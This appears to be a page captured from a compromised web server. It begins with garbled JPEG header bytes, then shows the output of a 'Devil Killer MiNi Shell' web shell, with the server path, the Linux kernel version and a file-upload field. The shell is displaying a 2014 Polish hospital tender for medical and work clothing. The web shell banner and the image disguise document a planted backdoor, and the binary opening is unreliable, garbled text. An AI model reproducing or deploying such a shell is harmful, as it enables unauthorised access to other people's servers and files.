JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140116/18672-N-2014.html

<p class="kh_header"><b>Jasło: Dostawa odzieży i obuwia dla personelu medycznego, odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów Szpitala Specjalistycznego w Jaśle</b><br>
<b>Numer ogłoszenia: 18672 - 2014; data zamieszczenia: 16.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny , ul. Lwowska 22, 38-200 Jasło, woj. podkarpackie, tel. 013 4437500, faks 013 4468322.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.jaslo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży i obuwia dla personelu medycznego, odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów Szpitala Specjalistycznego w Jaśle.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę odzieży i obuwia dla personelu medycznego, odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów, wg pakietów 1-3 - zgodnie z Drukiem nr 2 - formularz ofertowy i Drukiem nr 5 - formularz cenowy o wartości zamówienia nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy. 

Zamawiający zastrzega sobie prawo do przeprowadzenia badań laboratoryjnych, w akredytowanych laboratoriach lub laboratorium spełniającym wymagania normy PN - EN ISO/IEC 17025, dostarczonego przedmiotu umowy za zgodność z kartami charakterystyki i opisami na koszt Wykonawcy, dwukrotnie w ciągu trwania umowy.

Pakiet 1 - Dostawa odzieży dla personelu medycznego:
1.	Bluza i spodnie męskie				
2.	Bluza i spodnie damskie				
3.	Bluza i spódnica					
4.	Fartuch						
5.	Ubranie rehabilitanta męskie
6.	Ubranie rehabilitanta damskie
	
Wymagania wspólne dla Pakietu 1:
1.	Tkanina zastosowana do produkcji powinna umożliwić pranie odzieży w temperaturze min. 90 o C.
2.	 Tkanina zastosowana do produkcji odzieży powinna posiadać odporność na odbarwianie -   tkanina barwiona kadziowo odporna na działanie chloru.
3.	Odzież wymieniona w pakiecie powinna być wykonana z wyjątkową starannością, ściegi krawieckie powinny być proste, ciągłe, nieprzerwane w jednakowej odległości od brzegów tkaniny, obrzucenia powinny być wykonane na maszynach typu Overlock z maszynowym przycięciem zbędnych części materiału. Szwy w miejscach zespoleń różnych części odzieży jak i przy podwinięciach nie powinny powodować ściągania i zmarszczenia tkaniny. 
4.	Napy zastosowane powinny się charakteryzować odpornością na wysoką temperaturę przemysłowych urządzeń do prasowania.
5.	Ubranie lekarza: bluzy z kołnierzykiem lub ze stójką.
6.	Ubranie pielęgniarki, technika, gospodarcze: bluzy  bez kołnierzyka (V) lub inny kształt.
7.	Ubranie rehabilitanta: Podkoszulek/ koszulka polo.
8.	Spodnie na dole lekko zwężone, męskie zapinane na zamek z przodu z kieszeniami wpuszczanymi, damskie zapinane na zamek z przodu bez kieszeni. Spodnie z dodatkową regulacją w pasie gumkami po obu bokach.
9.	Spódnice zapinane na zamek z tyłu z dodatkową regulacją w pasie gumkami po obu bokach.
10.	Pranie - standardowe w przemysłowych pralkach z zastosowaniem środków piorących i dezynfekujących 
11.	Do oferty należy dołączyć katalog z proponowanymi wzorami odzieży minimum po dwa dla każdej pozycji. 
12.	Pod pojęciem wzorów Zamawiający rozumie - dwa komplety lub dwie sztuki odzieży różniące się pomiędzy sobą krojem bluzy, rodzajem kieszeni, kształtem kołnierzyka, sposobem wszycia rękawów, kieszeni. Jako różne wzory nie będą brane pod uwagę te same wzory tylko zaprezentowane z różnymi kolorami dodatków (lamówki, wypustki) lub różniące się fasonem spodni (wąskie, szerokie nogawki), spódnicy (rozkloszowana, zwężana) bez widocznych różnic w kroju bluzy, spodni, lub zaprezentowane w różnych rozmiarach np. S i XXL.
13.	Każdy z wzorów zaznaczonych w katalogu stanowiący alternatywną propozycję dla danej pozycji zostanie wyceniony w jednej cenie przedstawionej w formularzu ofertowym.
14.	Odzież zostanie uszyta zgodnie z wybranym przez Zamawiającego wzorem z wskazanych w katalogu przez Wykonawcę.

Pakiet 2 - Dostawa obuwia dla personelu medycznego:
1.	Buty profilaktyczne męskie, paski
2.	Buty profilaktyczne męskie, kryta cholewka
3.	Buty profilaktyczne damskie, sandały
4.	Buty profilaktyczne damskie, kryta cholewka

Pozostałe wymagania dla Pakietu 2:
1.	Do oferty należy dołączyć katalog z proponowanymi wzorami obuwia. Wykonawca powinien zaproponować (poprzez zaznaczenie w katalogu)  minimum po dwa wzory obuwia do wyboru przez Zamawiającego
2.	Każdy z wzorów zaznaczonych w katalogu stanowiący alternatywną propozycję dla danej pozycji zostanie wyceniony w jednej cenie przedstawionej w formularzu ofertowym.
3.	Obuwie wymienione w pakiecie powinno być wykonane z wyjątkową starannością, ściegi powinny być proste, ciągłe, nieprzerwane w jednakowej odległości od brzegów. Szwy w miejscach zespoleń różnych części obuwia jak i przy podwinięciach nie powinny powodować ściągania i zmarszczenia skóry.
4.	Do produkcji obuwia należy zastosować skóry, materiały i dodatki najlepszej jakości gwarantujące wysoką jakość gotowego wyrobu.
5.	Wymagana pełna rozmiarówka damska (35-42) i męska (40-48).

Pakiet 3 - Dostawa odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów:
1.	Ubranie robocze nieocieplane drelichowe 
2.	Koszula flanelowa 
3.	Buty - trzewiki robocze nieocieplane dla pracowników gospodarki i magazynierów, męskie
4.	Buty - trzewiki robocze nieocieplane dla magazynierki, damskie
5.	Półbuty czarne dla portiera, zaopatrzeniowca
6.	Trzewiki dla portiera, zaopatrzeniowca
7.	Koszula służbowa długi rękaw
8.	Koszula służbowa krótki rękaw
9.	Kurtka  całosezonowa z bluzą, podpinką do kurtki
10.	Kurtka ocieplana, męska
11.	Kurtka ocieplana, damska
12.	Czapka letnia  
13.	Czapka zimowa 
14.	Ubranie portiera - olimpijka i spodnie 

Pozostałe wymagania dla Pakietu 3:
1.	Odzież wymieniona w pakiecie powinna być wykonana z wyjątkową starannością, ściegi krawieckie powinny być proste, ciągłe, nieprzerwane w jednakowej odległości od brzegów tkaniny, obrzucenia powinny być wykonane na maszynach typu Overlock z maszynowym przycięciem zbędnych części materiału. Szwy w miejscach zespoleń różnych części odzieży jak i przy podwinięciach nie powinny powodować ściągania i zmarszczenia tkaniny. Guziki zastosowane powinny się charakteryzować odpornością na wysoką temperaturę przemysłowych urządzeń do prasowania.
2.	Do produkcji odzieży i obuwia należy zastosować tkaniny, materiały i dodatki najlepszej jakości gwarantujące wysoką jakość gotowego wyrobu.
3.	Oferowana odzież powinna zawierać na metce zalecania temperaturę prania i prasowania.
4.	Odzież dostępna w pełnej rozmiarówce damskiej i męskiej od S do XXL w ramach oferowanej ceny.
5.	Dodatkowo odzież dostępna według indywidualnej miary pracownika Zamawiającego w ramach oferowanej ceny.
6.	Wymagana jest pełna rozmiarówka obuwia, damska (35 - 42) i męska (40 - 48)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 18.81.33.00-4, 18.33.20.00-5, 18.20.00.00-1, 18.81.23.00-7, 18.81.20.00-4, 18.44.30.00-6, 18.11.00.00-3, 18.83.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu wykonawca jest zobowiązany wnieść wadium, w wysokości wymienionej poniżej płatnej do dnia 27-01-2014r. do godz. 11:30
Pakiet 1	900,00 zł
Pakiet 2	 1 000,00 zł

Wadium może być wniesione w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
	kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

 Wadium w formie pieniężnej wpłacać należy przelewem na rachunek bankowy:
Podkarpacki Bank Spółdzielczy O/Jasło, ul. Kościuszki 38 nr konta: 34 8642 1171 2017 7100 8585 0008
Z oznaczeniem: wadium - dostawa odzieży i obuwia dla Szpitala Specjalistycznego w Jaśle.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału będzie dokonywana metodą spełnia lub nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału będzie dokonywana metodą spełnia lub nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału będzie dokonywana metodą spełnia lub nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału będzie dokonywana metodą spełnia lub nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału będzie dokonywana metodą spełnia lub nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pakiet 1 - Dostawa odzieży dla personelu medycznego: 
a)	Certyfikat zgodności z Polską Normą PN-P - 84525:1998 zgodnie z dyrektywą 89/686/EWG (Odzież medyczna - kategoria I) wystawiony przez np.: Polskie Centrum Badań i Certyfikacji (PCB i C) lub przez niezależną, akredytowaną jednostkę jak np.: Instytut Włókiennictwa.
b)	Certyfikat zgodności z Polską Normą na zastosowaną w odzieży tkaninę:
-	pkt. 4.2 normy PN-EN 340:2006 (EN340:2003) Odzież ochronna. Wymagania ogólne w zakresie zawartości amin rakotwórczych, wartości pH, odporności wybarwień na pot;
-	tabela 2 normy PN-P-84525:1998 Odzież robocza. Ubrania robocze (z wyłączeniem przepuszczalności powietrza).
c)	Karta techniczna tkanin użytych do produkcji odzieży wystawiona przez producenta tkanin z opisem do uszycia, której odzieży tkanina będzie przeznaczona w celu potwierdzenia parametrów tkanin określonych w SIWZ (skład i gramatura tkaniny).
d)	Opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego w formie prospektów, katalogów odzieży w języku polskim określający: sposób zapinania bluz, rozmieszczenia i ilości kieszeni, sposób wykończenia przy szyi (z kołnierzykiem lub bez kołnierzyka), wykończenia lamówkami kieszonek i rękawów oraz zalecaną technologię prania z uwzględnieniem wymagań określonych przez Zamawiającego. Odzież ma być przedstawiona wyraźnie w katalogu lub zdjęciu, w kolorze, dającym możliwość porównania i sprawdzenia opisu odzieży z SIWZ. Nie dopuszcza się rysunków technicznych odzieży. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy zaznaczyć ( np zakreślaczem) w katalogach, proponowane wzory odzieży minimum po dwa dla każdej pozycji pakietu.

Pakiet 2 - Dostawa obuwia dla personelu medycznego:
a)	Certyfikat zgodności z Polską Normą PN-EN 347 zgodnie z dyrektywą 89/686/EWG (Obuwie medyczne - kategoria I) wystawiony przez np.: Polskie Centrum Badań i Certyfikacji (PCB i C). 
b)	Opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego w formie prospektów, katalogów w języku polskim określający zgodność wizualną oferowanego obuwia z opisem zawartym w SIWZ w zakresie cech widocznych, rodzaj cholewki, rodzaj podeszwy, sposób łączenia cholewki z podeszwą itp. W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy zaznaczyć ( np. zakreślaczem) w katalogach, proponowane wzory obuwia minimum po dwa dla każdej pozycji pakietu.

Pakiet 3 - Dostawa odzieży i obuwia roboczego (ochronnego), umundurowania i obuwia służbowego portierów:
a)	Oświadczenie Wykonawcy, że;
-	zaoferowana w ofercie odzież jest zgodna z normą PN-P-84525 - Odzież robocza, Ubrania robocze;
-	zaoferowane w ofercie obuwie  robocze jest zgodne z normą PN-EN 347-1.
b)	Opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów w języku polskim). W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy zaznaczyć (np zakreślaczem) w materiałach informacyjnych, gdzie znajduje się potwierdzenie wymaganego parametru.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo informacji o  działalności gospodarczej do oferty należy załączyć odpowiednie pełnomocnictwo (w oryginale lub kopii poświadczonej notarialnie). 
2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a)	do oferty należy załączyć dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego (w oryginale lub kopii poświadczonej notarialnie);
b)	wykonawcy, których oferta zostanie wybrana przedłożą przed zawarciem umowy w sprawie zamówienia publicznego umowę regulującą ich współpracę.
3.	Wypełniony formularz ofertowy - druk nr 2.
4.	Wypełniony formularz cenowy - druk nr 5.
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów tj. aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej (o których mowa w pkt. 3.3 pkt. 2 SIWZ) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
6.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 3.3.3 SIWZ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania stosuje się odpowiednio.

W przypadku składania jednej oferty przez dwóch lub więcej przedsiębiorców (art. 23), oferta spełniać musi następujące wymagania:
-	Wykonawcy, których oferta zostanie wybrana przedłożą przed zawarciem umowy w sprawie zamówienia publicznego umowę regulującą ich współpracę,
-	każdy z Wykonawców oddzielnie musi udokumentować, iż nie podlega wykluczeniu z postępowania na podst. art. 24 ust. 1 ustawy Prawo zamówień publicznych oraz, że jest uprawniony do występowania w obrocie prawnym zgodnie z wymogami ustawowymi.
-	w odniesieniu do pozostałych warunków muszą wykazać, że wspólnie spełniają wymagane warunki.
-	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie;
-	Wykonawcy ustalają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli wszystkich pozostałych Wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W okresie niezmienności cen, ceny mogą ulec zmianie w przypadku zmiany stawki podatku VAT, zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego tą stawkę. W razie zmiany stawki podatku VAT po zawarciu umowy, dla Stron wiążąca będzie stawka VAT obowiązująca w dniu wystawienia faktury, a zmiana kwoty ceny brutto z tego tytułu jest akceptowana przez Strony bez konieczności składania dodatkowych oświadczeń.
Dopuszcza się dostawę przedmiotu umowy po cenach niższych niż ustalone w umowie z zastrzeżeniem warunków dotyczących ich jakości określonych w SIWZ i umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.jaslo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny w Jaśle ul. Lwowska 22 - Dział Administracji Zamówień Publicznych i Zaopatrzenia - pokój nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2014 godzina 11:30, miejsce: Szpital Specjalistyczny w Jaśle 38-200 Jasło, ul. Lwowska 22 Sekretariat pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa odzieży dla personelu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odzieży dla personelu medycznego:
1.	Bluza i spodnie męskie				
2.	Bluza i spodnie damskie				
3.	Bluza i spódnica					
4.	Fartuch						
5.	Ubranie rehabilitanta męskie
6.	Ubranie rehabilitanta damskie
	
Wymagania wspólne dla Pakietu 1:
